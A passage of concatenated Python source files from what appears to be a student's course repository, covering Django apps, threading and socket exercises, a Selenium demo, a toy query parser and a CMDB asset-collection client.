"6.退出\n: \033[0m") if choice_id =='0': schoolid.show_class() if choice_id == '1': schoolid.creat_class() elif choice_id == '2': schoolid.creat_course() elif choice_id == '3': schoolid.show_course() elif choice_id == "4": schoolid.create_teacher() elif choice_id == '5': schoolid.show_teacher() # elif choice_id == '6': # select_school() elif choice_id == '6': sys.exit() def student_view(): #学生视图 choice_id = input("\n*************************学生功能********************\n" "0.查看班级" "1.查看课程") if choice_id =='0': schoolid.show_class() elif choice_id == '1': schoolid.show_course() def teacher_view(): #老师视图 choice_id = input("\n*************************讲师功能********************\n" "0.查看班级" "1.查看课程" "2.退出\n: ") if choice_id == '0': schoolid.show_class() elif choice_id == '1': schoolid.show_course() elif choice_id =='2': sys.exit() #@wrapper def select_school(): global schoolid choice_school_id = input("\033[1;32m*************************请选择学校********************\n" "a.北京校区" "b.上海校区" "q.退出\n: \033[0m") if choice_school_id == 'a': schoolid = school1 elif choice_school_id == 'b': schoolid = school2 elif choice_school_id == 'q': sys.exit() else: print("\033[4;35m请输入真确的选项:\033[0m") #@wrapper def select_fun(): # 选择功能 global choice_id choice_id = input("\n*************************请选择角色********************\n" "1.学员视图" "2.讲师视图" "3.管理视图" "4.返回\n: ") if choice_id == '1': student_view() elif choice_id == '2': teacher_view() elif choice_id == '3': control_view() # print("你好11111") elif choice_id == '4': select_school() # else: # return #time.sleep(2) #@wrapper def main(): while True: login() #选择学校 # while True: # login()#选择功能 if __name__ == '__main__': classrooms = {} teachers = {} courses = {} students = {} school1 = School('昌平校区') school2 = School('浦东校区') main() <file_sep>/student_guanli_system/core/mypickle.py import pickle class MyPickle: def __init__(self,filepath): self.filepath = filepath def dump(self,sch_obj): with open(self.filepath,'ab') as f: pickle.dump(sch_obj,f) def load(self): with open(self.filepath, 'rb') as f: while True: try: obj = pickle.load(f) yield obj except Exception: break def get_item(self,num): with open(self.filepath, 'rb') as f: while num>0: try: obj = pickle.load(f) except Exception: break num -=1 return obj<file_sep>/day17/lianxi/lianxi/urls.py """lianxi URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/1.11/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.conf.urls import url, include 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls')) """ from django.conf.urls import url from django.contrib import admin from app01 import views urlpatterns = [ url(r'^admin/', admin.site.urls), url(r'^publisher_list/$', views.publisher_list,name="list"), # 动态传参-FBV # url(r'^edit_publisher/(\d+)/$', views.edit_publisher), # 动态传参-CBV url(r'^edit_publisher/(?P<edit_id>\d+)/$', views.EditPublisher.as_view(), name="wusir"), # url传参 # url(r'^edit_publisher/$', views.edit_publisher), # 上传文件 url(r'^upload/$', views.upload.as_view()), # 测试返回Json格式数据 url(r'^json_test/$', views.JsonTest.as_view()), # 测试模板语法 url(r'^template_test/$', views.template_test), # 测试跨站请求伪造 (CSRF) url(r'^csrf_test/$', views.csrf_test), # 外键增删改查 # 查看列表 url(r'^book_list/$', views.book_list), # 增加 url(r'^add_list/$', views.add_list,name="add_book"), # 删除 url(r'^del_book/(?P<pk>\d+)$', views.del_book, name="del_book"), # 编辑 url(r'^edit_book/(?P<pk>\d+)$', views.edit_book, name="edit_book"), # 登录设置cookie url(r'^login/$', views.login), ] <file_sep>/day9/线程/守护线程.py from threading import Thread import time def foo(): while 1: print(123) time.sleep(1) def bar(): print(456) time.sleep(5) print('end456') t1=Thread(target=foo) t2=Thread(target=bar) t1.daemon=True #t1是守护线程,t2是主线程 t1.start() t2.start() print('#####') #主线程 # 主线程结束了之后守护线程也同时结束 # 守护线程会等待主线程完全结束之后才结束 #递归锁(Rlock) from threading import RLock lock = RLock() lock.acquire() lock.acquire() print(123) lock.release() print(456) lock.release()<file_sep>/day8/解决粘包/server.py import socket import struct sk=socket.socket() sk.bind(('127.0.0.1',8090)) sk.listen() conn,addr=sk.accept() inp=input('>>>:').encode('utf-8') inp_len=len(inp)#计算用户输入的长度 bytes_msg=struct.pack('i',inp_len)#将数字转换成固定的bytes conn.send(bytes_msg) #先发送报头的长度4个bytes conn.send(inp)#在发送报头的字节格式 conn.send(b'alex sb')#最后发送真实内容的字节格式 conn.close() sk.close() <file_sep>/auto_client/src/script.py from conf import settings from src.client import AgentClient from src.client import SaltSshClient def start(): if settings.MODE == 'AGENT': obj = AgentClient() elif settings.MODE == 'SSH' or settings.MODE == 'SALT': obj = SaltSshClient() else: raise Exception("仅支持agent,ssh,salt") obj.exec() <file_sep>/day26/selenium自动化操作/1 自动化.py from selenium import webdriver import time # 创建一个浏览器 bro = webdriver.Chrome(executable_path=r'./chromedriver_win32/chromedriver.exe') # 取得程序的路径 # 打开浏览器 url = 'https://www.baidu.com' # 发送请求 bro.get(url=url) time.sleep(3) # 调用seleniem提供的接口 # 找到指定的搜索框 myInput = bro.find_element_by_id("kw") # 在对应搜索框录入指定的词条 myInput.send_keys('美女') time.sleep(2) # 点击搜索,定位到搜索按钮 myButton = bro.find_element_by_id('su') myButton.click() # 点击按钮 time.sleep(2) # myButton2=bro.find_elements_by_xpath('//*[@id="3"]/h3/a')[0].click() # 关闭浏览器 bro.quit() <file_sep>/day21/CMS/fault_reporting/forms.py from django import forms from django.core.validators import RegexValidator from django.core.exceptions import ValidationError from fault_reporting import models import re # 1. 正则的校验规则 # 2. 自定义函数 def check_email(value): # <EMAIL> ret = re.match(r'^[a-zA-Z0-9_.-]+@[a-zA-Z0-9-]+(\.[a-zA-Z0-9-]+)*\.[a-zA-Z0-9]{2,6}$', value) if not ret: # 邮箱格式匹配不上 raise ValidationError("邮箱格式不正确") else: return value # 注册的form类 class RegisterForm(forms.Form): username = forms.CharField(min_length=2, label="用户名") password = forms.CharField( label="密码", min_length=6, widget=forms.widgets.PasswordInput() ) re_password = forms.CharField( label="确认密码", min_length=6, widget=forms.widgets.PasswordInput(attrs={"class": "form-control"}) ) phone = forms.CharField( label="手机号", min_length=11, max_length=11, validators=[RegexValidator(r'^1[3-9]\d{9}$', "手机号码格式不正确")], ) email = forms.CharField( label="邮箱", validators=[check_email, ] ) # 局部钩子 def clean_username(self): # 做用户名不能重复的校验 username = self.cleaned_data.get("username") #获取用户名 # 去数据库查重 is_exist = models.UserInfo.objects.filter(username=username) if is_exist: # 用户名已经被注册 raise ValidationError("用户名已被注册") else: return username # 全局钩子,用来多多字段的比较 def clean(self): pwd = self.cleaned_data.get("password") re_pwd = self.cleaned_data.get("re_password") if re_pwd != pwd: # 两次填写的密码不一致 self.add_error("re_password", "两次密码不一致") raise ValidationError("两次密码不一致") else: return self.cleaned_data # 重写init def __init__(self, *args, **kwargs): super(RegisterForm, self).__init__(*args, **kwargs) # 循环给每个字段加 class: form-control for field in iter(self.fields): self.fields[field].widget.attrs.update({ 'class': 'form-control' }) <file_sep>/复习/数据类型.py #切片 # s = 'python自动化21期' # s1=s[1:3] # print(s[1:6:2]) # print(s[0:]) # # 打印到最后但是不包括最后一个 # print(s[:-1]) # print(s[6:0:-2]) #capitalize大小写 s2='hu' # s1=s2.capitalize() # print(s1) # print(s2.upper()) # print(s2.lower()) # print(s2.swapcase()) #title # ss = '<NAME>*oldboy3taibiahu' # print(ss.title()) # # print(s2.center(30,'*')) #**************hu************** #strip # s = 'tyoyldBoyrte' # s1='hkdjkltkjkedfdty' # print(s) # print(s.strip()) # print(s1.strip('tey')) # # name=input('>>>').strip() # if name == 'hu': # print('登录成功') # split 以什么分割,最终形成一个列表此列表不含有这个分割的元素 # b = 'oldboywusiroalex' # l = b.split() # 字符串变成列表 # print(l) # s1 = 'oldboy,wusir,alex' # print(s1.split(','))# 字符串变成列表 # # l3 = b.split('o',3)#以o分割,最终形成3个列表 # print(l3) #join # sa = 'oldBoy' # s9 = '+'.join(sa) ##用‘+’号把字符串连接起来 # print(s9) # # l1 = ['oldboy','wusir','alex'] # s91=','.join(l1) # print(s91) #find 通过元素找索引 找不到返回-1,找到返回1 u = 'odlabced' u1 = u.find('d') print(u1) #字符串格式化输出format # res='我叫{},今年{},爱好{}'.format('egon','18','女') # print(res) # # res1='我叫{0}今年{1}岁,爱好{2},我依然叫{0}'.format('egon',18,'male') # print(res1) # # res3='{name} {age} {sex}'.format(sex='male', name='egon', age=18) # print(res3) #list # l = ['老男孩', 'alex', 'wusir', 'taibai', 'ritian'] # l.extend('hu') # print(l) # print(l.pop(0)) # l.remove('alex') # print(l) # print(l[2]) # l[2]='huningfei' # print(l) #元组 tu=(11,2,True,[2,3,4],'alex') # for i in tu: # print(i) # print (tu[:3:2]) # print(tu.index(True)) # tu[-2].append('99') # print(tu) #字典 # dic = {'name': 'taibai', 'age': 21, 'hobby': 'girl', } # dic['high']=190 # print(dic) # dic.setdefault('high',180) # print(dic) # print(dic.pop('name')) # print (dic.pop('name1','没有辞职,sb')) # dic2 = {'name':'alex','weight':75} # dic2.update(dic) #将dic所有的键值对覆盖添加(相同的覆盖,没有的添加)到dic2中 # print(dic) # print(dic2) #查 # print(dic.get('name')) # print (dic.get('name1','没有此键值')) # # print (list(dic.keys()))#取出键值 # for i in dic.keys(): # print(i) # # print(list(dic.values()))#取出value # print(list(dic.items()))#同事取出键值和value # print(len(dic)) dic = {'k1':'v1','k2':'v2','k3':'v3','r':666} l1 = [] # for i in dic: # if 'k' in i: # l1.append(i) # print(l1) # # for i in l1: # del dic[i] # print(dic) <file_sep>/day20/CMS/fault_reporting/urls.py from django.conf.urls import url from fault_reporting import views urlpatterns = [ # 第一版, 特别low版 # url('^lob/(.*)/$', views.lob), # url('^tag/(.*)/$', views.tag), # url('^archive/(.*)/$', views.archive), # # # 第二版: 三合一 # url(r'(lob|tag|archive)/(.*)/$', views.sanhe1), # sanhe1(request, *args) args[0]=="lob" # 第三版: 四合一 url(r'(lob|tag|archive)/(.*)/$', views.index), # index(request, "lob", "游戏") url('^$', views.index), # index(request) ]<file_sep>/day5/正则.py # \w{2,}? ##匹配两次,问号是惰性匹配 # \w{2,} #匹配两次或更多次 # \w{2,3} ##匹配两次到三次因为是贪婪匹配,所以默认匹配三次 # https://www.cnblogs.com/Wxtrkbc/p/5453349.html # https://www.cnblogs.com/wushank/p/5172792.html # import re # expression='(( 100 + 40 )*5/2- 3*2* 2/4+9)*((( 3 + 4)-4)-4)' # l=re.findall('([\d\.]+|/|-|\+|\*)',expression) # print(l) import re expression= '100.5+40*5/2-3*2*2/4+9' l = re.findall('([\d\.]+|/|-|\+|\*)',expression) #print(100.5+40*5/2-3*2*2/4+9) # 206.5 def multdiv(l,x): #定义最小的乘除运算单元,l是列表,x代表*或/ a = l.index(x) #首先获取乘除运算符的位置 if x=='*': #如果是*则执行乘法运算 k = float(l[a - 1]) * float(l[a + 1]) #获取乘法运算的结果,比如k=3*2 else: k = float(l[a - 1]) / float(l[a + 1]) del l[a - 1], l[a - 1], l[a - 1] #删除掉列表里刚做运算的三个元素,比如,3 * 2 l.insert(a - 1, str(k)) #将刚计算的结果插入到列表中然后执行下一次计算 print(l) <file_sep>/deploy/web/forms/host.py from django.forms import ModelForm from web.forms.base import BootStrapModelForm from web import models class HostModelForm(BootStrapModelForm): class Meta: model = models.Host fields = "__all__"<file_sep>/day21/CMS/fault_reporting/apps.py from django.apps import AppConfig class FaultReportingConfig(AppConfig): name = 'fault_reporting' <file_sep>/day4/作业备份.py ##转换数据 TITLE=['id','name','age','phone','job'] with open('userinfo',encoding='utf-8',mode='r') as f1: dic = {} for i in TITLE: dic[i] = [] #print(dic) for line in f1: pid,name,age,phone,job = line.split(",") dic['id'].append(pid) dic['name'].append(name) dic['age'].append(age) dic['phone'].append(phone) dic['job'].append(job) #print(dic) def gt(a,b): match_list =[] for index,val in enumerate(dic[a]): ##age[22,23,]并求出age的各个索引 if int(val) > int(b): ##匹配上了 # print("match",val) onwer_list=[] for col in TITLE: onwer_list.append(dic[col][index]) match_list.append(onwer_list) #print("查询到的数据:",match_list) return match_list ''' :param a: age :param b: 22 :return: ''' def lt(a,b): match_list = [] for index, val in enumerate(dic[a]): ##age[22,23,]并求出age的各个索引 if int(val) < int(b): ##匹配上了 # print("match",val) onwer_list = [] for col in TITLE: onwer_list.append(dic[col][index]) match_list.append(onwer_list) # print("查询到的数据:",match_list) return match_list def eq(a,b): match_list = [] for index, val in enumerate(dic[a]): ##age[22,23,]并求出age的各个索引 if val == b: ##匹配上了 # print("match",val) onwer_list = [] for col in TITLE: onwer_list.append(dic[col][index]) match_list.append(onwer_list) # print("查询到的数据:",match_list) return match_list def op_like(a,b): match_list = [] for index, val in enumerate(dic[a]): ##age[22,23,]并求出age的各个索引 if b in val: ##匹配上了 # print("match",val) onwer_list = [] for col in TITLE: onwer_list.append(dic[col][index]) match_list.append(onwer_list) # print("查询到的数据:",match_list) return match_list def check_where(right_yuju): tiaojian = { '>':gt, '<':lt, '=':eq, 'like':op_like, } for fu_hao,value in tiaojian.items(): #print(value) if fu_hao in right_yuju: a,b = right_yuju.split(fu_hao)#a和b接受到了age和22 matched_data = value(a.strip(),b.strip()) #print(matched_data) return matched_data else: print('where语法错误') ''' 解析where条件,判断大于,小于,等于和like :return: age>22 ''' def select(match_data,left_yuju): """ ##这个只是可以查看name和age的语句 :param match_data:[['2', 'Egon', '23', '13304320533', 'Tearcher\n'], ['3', 'nezha', '25', '1333235322', 'IT']] :param left_yuju: select name, age from userinfo :return: """ filter_cols_tmp = left_yuju.split('from')[0].split()[1:] #取出name,和age 例:[' name', ' age '] filter_cols = [i.strip().strip(",") for i in filter_cols_tmp] ##取出干净的name和age #print(filter_cols) reformat_data_set = []##最终要打印的数据 for row in match_data: ##row是['3', 'nezha', '25', '1333235322', 'IT'] #print(row) filtered_vals=[] ##['Egon', '23'] ['nezha', '25'] for col in filter_cols: ##col是name和age col_index = TITLE.index(col) ##name和age在title里面的索引1和2的位置 filtered_vals.append(row[col_index])#['3', 'nezha', '25', '1333235322', 'IT'][1] reformat_data_set.append(filtered_vals) print(reformat_data_set) def check_input(cmd): ## 检测输入的语句,并分割成两个语句(cmd是从用户输入的命令传过来的) """ :param cmd: select name, age where age>22 :return: """ syntax_list={ 'select':select, 'update':update, 'add':insert, 'delete':delete } if cmd.split()[0] in ('select','update','delete','insert'):#取出用户输入的第一个命令 left_yuju,right_yuju = cmd.split('where')#以where关键字分割语句 matched_data=check_where(right_yuju)#把where后面的语句传送给了check_where syntax_list[cmd.split()[0]](matched_data,left_yuju) else: print("语法错误") def where(): pass def insert(): pass def update(): pass def delete(): pass ##输入语句 def yuju(): while True: cmd = input("mysql>>:").strip() if not cmd: continue check_input(cmd) ##传给检测你输入语句的函数 yuju()<file_sep>/模板/auto - 2 - 固定二级菜单示例/auto - 2 - 固定二级菜单示例/web/models.py from django.db import models # Create your models here. class User(models.Model): ''' 用户表 ''' name = models.CharField(verbose_name='姓名', max_length=32) class Order(models.Model): ''' 订单表 ''' name = models.CharField(verbose_name='名字', max_length=32) <file_sep>/day17/lianxi/app01/models.py from django.db import models # Create your models here. # 建表出版社 class Publisher(models.Model): name = models.CharField(max_length=22) # 书籍表关联出版社 class Book(models.Model): title = models.CharField(max_length=32) publisher = models.ForeignKey(to="Publisher", on_delete=models.CASCADE) # 人员表 class Person(models.Model): name = models.CharField(max_length=22) age = models.IntegerField() birthday = models.DateField() birthday2 = models.DateTimeField(null=True) phone = models.CharField(max_length=11, unique=True) # 创建该记录时自动把当前时间保存到该字段 join_date = models.DateField(auto_now_add=True) # 更新该记录的值时 自动把当前时间保存到该字段 last_date = models.DateField(auto_now=True) def __str__(self): return "{}-{}".format(self.name, self.age, self.phone) <file_sep>/day18/练习/app01/models.py from django.db import models # Create your models here. class Publisher(models.Model): name = models.CharField(max_length=20) class Book(models.Model): title = models.CharField(max_length=20) publisher = models.ForeignKey(to="Publisher") class Author(models.Model): name = models.CharField(max_length=20) books = models.ManyToManyField(to="Book", related_name="authors") class Userinfo(models.Model): name=models.CharField(max_length=20)<file_sep>/day19/form/app01/views.py from django.shortcuts import render,redirect from app01 import models from app01.forms import BookForm import datetime # Create your views here. def book_list(request): print(request.user.username,type(request.user)) data=models.Book.objects.all() return render(request,"book_list.html",locals()) def add_book(request): form_obj=BookForm() if request.method=="POST": form_obj=BookForm(request.POST) if form_obj.is_valid(): #做数据有效性校验 # 因为有多对多的字段,所以需要额外处理 authors=form_obj.cleaned_data.pop("authors") # 创建新书籍对象 book_obj=models.Book.objects.create(**form_obj.cleaned_data) # 讲书籍对象和作者建立关联 book_obj.authors.add(*authors) return redirect("/book_list/") return render(request,"add_book.html",locals()) def edit_book(request,pk): book_obj=models.Book.objects.filter(id=pk).first() from django.forms import model_to_dict book_dict=model_to_dict(book_obj) book_dict["publisher_date"]=book_obj.publisher_date.strftime("%Y-%m-%d") form_obj=BookForm(book_dict) if request.method=="POST": form_obj=BookForm(request.POST) if form_obj.is_valid(): book_obj.title=form_obj.cleaned_data.get("title") book_obj.publisher_id=form_obj.cleaned_data.get("publisher_date") book_obj.publisher_id=form_obj.cleaned_data.get("publisher") book_obj.save() book_obj.authors.set(form_obj.cleaned_data.get("authors")) return redirect("/book_list") return render(request,"edit_book.html",locals()) def del_book(request,pk): models.Book.objects.filter(id=pk).delete() return redirect("/book_list") <file_sep>/deploy/web/forms/deploy.py from django import forms from web.forms.base import BootStrapModelForm from web import models class DeployModelForm(BootStrapModelForm): class Meta: model = models.Deploy fields = ['version','script'] class DeployPushForm(forms.Form): hosts = forms.MultipleChoiceField( label='选择主机', choices=[(1,'1.1.1.1'),(2,'1.1.1.2')], widget=forms.CheckboxSelectMultiple() ) def __init__(self,project_object, *args,**kwargs): super(DeployPushForm,self).__init__(*args,**kwargs) self.fields['hosts'].choices = project_object.hosts.all().values_list('id','hostname')<file_sep>/auto_server/api/plugins/__init__.py from django.conf import settings from repository import models import importlib from .server import Server class PluginManger(object): def __init__(self): self.plugin_items = settings.PLUGIN_ITEMS self.basic_key = "basic" self.board_key = "board" def exec(self,server_dict): ''' :param server_dict: 客户端发送过来的数据 :return:1,执行完全成功; 2, 局部失败;3,执行失败;4. 服务器不存在 ''' ret = {'code': 1, 'msg': None} hostname = server_dict[self.basic_key]['data']['hostname'] server_obj = models.Server.objects.filter(hostname=hostname).first() if not server_obj: # 如果没有这个主机,则返回ret,并不是去数据库直接创建主机了,你需要先去后台创建主机名才可以 ret['code'] = 4 return ret # 更新操作 obj = Server(server_obj, server_dict[self.basic_key], server_dict[self.board_key]) # 执行server里面的函数,生成obj对象 obj.process() # 对比更新[硬盘,网卡,内存,可插拔的插件] for k, v in self.plugin_items.items(): # 去循环setting里面的配置的硬盘,内存信息 # "nic": "api.plugins.nic.Nic", try: module_path, cls_name = v.rsplit('.', maxsplit=1) md = importlib.import_module(module_path) cls = getattr(md, cls_name) # cls是指disk,nic,memory等插件 obj = cls(server_obj, server_dict[k]) # server_obj是主机名,server_dict[k]是指硬盘或者内存的数据 # print(obj) obj.process() except Exception as e: ret['code'] = 2 return ret <file_sep>/day4/匿名函数.py # lambda表达式 # def add(a,b): # return a+b # add = lambda a,b : a+b # print(add(1,2)) # [i**2 for i in range(10)] # def func(num): # return num ** 2 # # # for i in map(func,range(10)):print(i) # for i in map(lambda num : num ** 2 ,range(10)):print(i) # def func(num): # return num%2 # print(min(-2,3,-4,key=func)) # print(min(-2,3,-4,key=lambda num:num%2)) # d = lambda p:p*2 # t = lambda p:p*3 # x = 2 # x = d(x) # x = 4 # x = t(x) # x = 12 # x = d(x) # print(x) # 现有两元组(('a'),('b')),(('c'),('d')),请使用python中匿名函数生成列表[{'a':'c'},{'b':'d'}] # def func(t): # return {t[0]:t[1]} # ret = map(func,zip((('a'),('b')),(('c'),('d')))) # print(list(ret)) # ret = map(lambda t:{t[0]:t[1]},zip((('a'),('b')),(('c'),('d')))) # print(list(ret)) # 3.以下代码的输出是什么?请给出答案并解释。 def multipliers(): return [lambda x: i * x for i in range(4)] print([m(2) for m in multipliers()]) # def multipliers(): # lst = [] # i = 0 # lst.append(lambda x:i*x) # i = 1 # lst.append(lambda x:i*x) # i = 2 # lst.append(lambda x:i*x) # i = 3 # lst.append(lambda x:i*x) # # lst = [lambda x:3*2,lambda x:i*x,lambda x:i*x,lambda x:i*x] # return lst # print([m(2) for m in multipliers()]) # def multipliers(): # return (lambda x:i*x for i in range(4)) g = (lambda x: i * x for i in range(4)) # print([m(2) for m in g]) # 请修改multipliers的定义来产生期望的结果。<file_sep>/cmdb/auto_client - 7 - 资产信息入库/相关脚本/run.py #!/usr/bin/python # -*- coding:utf-8 -*- import requests import json def agent(): """ 获取当前服务器的资产信息并提交给api :return: """ # 1. 获取资产信息:硬盘、网卡、内存...(linux或win的判断) import subprocess disk = subprocess.getoutput('dir') info = {'hostname':'c1','memory':disk} # 2. 日志处理(堆栈信息) # 3. 唯一标记问题 # 如果只是物理机:sn做唯一标记 # 物理+虚拟机:1. 系统+调用openstack api ;2.主机名做唯一标记 url = "http://127.0.0.1:8000/api/asset/" r1 = requests.post( url=url, data=json.dumps(info).encode('utf-8'), # data={'k1':'v1','k2':'v2'} # hostname=c1&memory=xxxxx ) print(r1.text) def task(host): # 每一台主机,调用ssh或salt接口远程连接上主机并执行命令 获取结果。(线程池的方式进行采集) info = {'hostname': host, 'disk': '....'} # 通过requests发送POST请求将资产数据提交到api url = "http://127.0.0.1:8000/api/asset/" r1 = requests.post( url=url, data=json.dumps(info).encode('utf-8'), ) print(r1.text) def ssh(): # 1. 获取未采集服务器列表 r1 = requests.get(url="http://127.0.0.1:8000/api/asset/") # print(r1.content, r1.text, r1.json() ) host_list = r1.json() from concurrent.futures import ThreadPoolExecutor pool = ThreadPoolExecutor(10) for host in host_list: pool.submit(task,host) ssh()<file_sep>/day4/1.复习.py # 文件操作 # 打开文件 # f = open('文件路径') 默认的打开方式r ,默认的打开编码是操作系统的默认编码 # r w a (r+ w+ a+) 以上6种加b ,如果打开模式+b,就不需要指定编码了 # 编码 UTF-8 ,gbk # 操作文件 # 读 # read 不传参数 意味着读所有 # 传参,如果是r方式打开的,参数指的是读多少个字符 # 传参,如果是rb方式打开的,参数指的是读多少个字节 # readline # 一行一行读 每次只读一行,不会自动停止 # for循环的方式 # 一行一行读 从第一行开始 每次读一行 读到没有之后就停止 # 写 # write 写内容 # 关闭文件 # f.close() # with open() as f: # 修改文件 : # import os # os.remove # os.rename # 函数 # 定义 # 关键字 def 函数名(形参): # 参数 : # 位置参数 # *args 动态传参 :接收在调用的时候传过来的多余的所有按位置传的参数 # 关键字参数 默认参数,如果不传会有一个默认的值,如果传了会覆盖默认的值 # **kwargs 动态传参 :接收在调用的时候传过来的多余的所有按关键字传的参数 # 返回值 # return 停止一个程序的运行,返回参数 # 没有返回值 默认返回None # 有一个返回值 # 返回多个值 # 调用 # 调用的关键字 函数名(实参) # 传参数 : # 按照位置传 # 按照关键字传 # 接收返回值 # 没有返回值 不接受 # 有一个返回值 用一个变量接收 # 有多个返回值 # 用一个变量接收 所用返回值都会被组织成一个元组 # 用多个变量接收 有多少个返回值 就必须用多少个变量接收 # 函数是第一类对象的概念 # 函数名 --> 函数的内存地址 # 函数名可以作为 容器类型的元素 函数的参数、返回值 还能进行赋值 --> 变量 # 闭包和装饰器 # 闭包的定义 : 内部函数引用外部函数的变量 # 闭包的应用 :装饰器<file_sep>/day3/练习.py # 1. 文件a.txt内容:每一行内容分别为商品名字,价钱,个数。 # apple 10 3 # tesla 100000 1 # mac 3000 2 # lenovo 30000 3 # chicken 10 3 # 通过代码,将其构建成这种数据类型:[{'name':'apple','price':10,'amount':3},{'name':'tesla','price':1000000,'amount':1}......] 并计算出总价钱。 #new_list=[] # total = 0 # with open('article',encoding='utf-8') as f1: # for i in f1: # a=(i.split()) # # print(a) # new_list.append({'name':a[0],'price':a[1],'amount':a[2]}) # print(new_list) # f1.close() # for g in new_list: # money = g['price'] # count = g['amount'] # total = total + int(money) * int(count) # print(total) ##第二种写法,别人的 # product = [] # file = open("article") # flag = True # total = 0 # while flag: # line = file.readline().strip() # if not line: # flag = False # break # temp = line.split() # p = {"name": '', 'price': 0, 'amount': 0} # p['name'] = temp[0] # p['price'] = int(temp[1]) # p['amount'] = int(temp[2]) # total = total + p.get('price') * p.get('amount') # product.append(p) # # file.close() # print(product) # print(total) # 2,有如下文件: # ------- # alex是老男孩python发起人,创建人。 # alex其实是人妖。 # 谁说alex是sb? # 你们真逗,alex再牛逼,也掩饰不住资深屌丝的气质。 # ---------- # 将文件中所有的alex都替换成大写的SB。 # import os # with open('2.txt',encoding='utf-8') as f1,\ # open('2.txt.bak',encoding='utf-8',mode='w') as f2: # for line in f1: # new_line = line.replace('alex','SB') # f2.write(new_line) # os.remove('2.txt') # os.rename('2.txt.bak','2.txt') # 2、写函数,检查获取传入列表或元组对象的所有奇数位索引对应的元素,并将其作为新列表返回给调用者。 # new_list=[] # jishu = [] # def func1(*args): # return 111,22,3,4,5,7,87 # ret = func1() # new_list.extend(ret) # #print(new_list[0]) # for i in range(len(new_list)): # if i%2 != 0: # jishu.append(new_list[i]) # else: # pass # print(jishu) # ret1=[] # with open('2.txt',encoding='utf-8') as f1: # li = f1.readline().split() # print(li) # for i in f1: # dic = {} # #print(i) # for j in range(len(li)): # dic[li[j]] = i.split()[j] # ret1.append(dic) # print(ret1) ##推导式 # list = [] # with open('2.txt',encoding='utf-8') as f1: # keys = [i for i in f1.readline().split()] # #print(keys) # for volumes in f1: # print(volumes) # list.append({k:v for k,v in zip(keys,volumes.split())}) # print(list) ##注册 # user_status = { # 'username': None, # 'status': False # } # def register(): # flag = True # while True: # with open('register', encoding='utf-8', mode='r') as f1,\ # open('register', encoding='utf-8', mode='a') as f2: # username = input("请输入你要注册的用户名:") # for i in f1: # if username in i: # print("用户名已经存在,请更改") # break # else: # while flag: # one_passwd = input("请输入你的密码:") # two_passwd = input("请再次输入你的密码:") # if one_passwd != two_passwd: # print("你的密码不一致,请重新输入") # continue # else: # f2.write('%s %s\n' % (username, two_passwd)) # user_status['status'] = True # if user_status.get('status'): # print("你已经注册并登陆成功") # flag = False # # break # f1.close() # f2.close() # register() # ##登录 # # # def login(): # print('注意,超过三次锁定用户') # b = 0 # while b < 3: # username = input("请输入你的用户名:") # password = input("请输入你的密码:") # with open('register',encoding='utf-8')as f1: # for i in f1: # a = (i.split()) # if a[0] == username and a[1] == password: # user_status['status'] = True # print(user_status.get('status')) # print("登录成功") # exit() # else: # print("登录失败,请重新登录,你已经用了%s次" % (b+1)) # b += 1 # login() ##装饰 # def wrapper(f1): # def inner(*args,**kwargs): # if user_status.get('status') ##如果登录成功,则正常访问 # ret = f1(*args,**kwargs) # return ret # else: # login() # return f1 # wrapper() def inner(): with open('article',encoding='utf-8') as f1: wen = f1.read() return wen print(type(inner)) print(type(str(inner))) if logout() in inner: exit() <file_sep>/day15/作业/conf/setting.py host = "127.0.0.1" port = 3306 database = "user" user = "root" password = "123" charset = "utf8" logdir = "../logs/info.log" <file_sep>/day3/博客园作业.py ##博客地址:http://www.cnblogs.com/huningfei/p/8849749.html 文件 ##http://www.cnblogs.com/huningfei/p/8849968.html 函数 ##存贮用户登录状态的 user_status = { 'username': None, 'status': False } ##登录函数 def wrapper(f2): def inner(): func1 = str(inner) func2 = str(quit) if func2 in func1: exit() if user_status.get('status'): f2() ##就是被装饰的函数 else: print('\033[1;33m注意,请先登录,在操作,超过三次锁定用户\033[0m') b = 0 while b < 3: username = input("\033[1;33m请输入你的用户名:\033[0m") password = input("\033[1;33m请输入你的密码:\033[0m") with open('register',encoding='utf-8')as f1: for i in f1: a = (i.split()) if a[0] == username and a[1] == password: user_status['status'] = True print("\033[1;33m登录成功\033[0m") return username else: print("登录失败,请重新登录,你已经用了%s次" % (b+1)) b += 1 return inner @wrapper def login(): ##这里重新定义一个login函数,因为你如果直接执行装饰器会报错,因为里面传了一个参数 pass def register(): ##注册 flag = True while True: with open('register', encoding='utf-8', mode='r') as f1,\ open('register', encoding='utf-8', mode='a') as f2: username = input("请输入你要注册的用户名:").strip() if not username.isalnum() or not username.isdigit(): pass else: print("用户名不能只有数字,请更改") continue for i in f1: if username in i: print("用户名已经存在,请更改") break else: while flag: one_passwd = input("请输入你的密码:").strip() two_passwd = input("请再次输入你的密码:").strip() if one_passwd != two_passwd: print("你的密码不一致,请重新输入") continue else: f2.write('%s %s\n' % (username, two_passwd)) user_status['status'] = True flag = False break f1.close() f2.close() @wrapper # article = login(article) def article(): with open('article',encoding='utf-8') as f1: print(f1.read()) @wrapper def diary(): print('\033[1;33m-----欢迎来到日记页面-----\033[0m') @wrapper def comment(): print('\033[1;33m-----欢迎来到评论页面------\033[0m') @wrapper def collection(): print('\033[1;33m------欢迎来到收藏页面------\033[0m') @wrapper def logout(): user_status['status'] = False print("\033[1;33m你已经退出\033[0m'") @wrapper def quit(): print("你已退出整个程序") exit() dic = {1:login, 2:register, 3:article, 4:diary, 5:comment, 6:collection, 7:logout, 8:quit } ##输出提示内容 while True: with open('zuoye',encoding='utf-8') as f1: print(f1.read()) num= int(input("请选择一个序号操作:").strip()) dic.get(num)() <file_sep>/deploy/web/forms/base.py from django import forms class BootStrapModelForm(forms.ModelForm): def __init__(self,*args,**kwargs): super(BootStrapModelForm,self).__init__(*args,**kwargs) # 循环找到form中所有的字段,为每个字段你添加一个样式 for k,v in self.fields.items(): v.widget.attrs['class'] = 'form-control' <file_sep>/cmdb/auto_client - 7 - 资产信息入库/lib/module_string.py #!/usr/bin/python # -*- coding:utf-8 -*- import importlib def import_string(path): """ 根据字符串的形式去导入路径中的对象 :param path: 'src.engine.agent.AgentHandler' :return: """ module_path,cls_name = 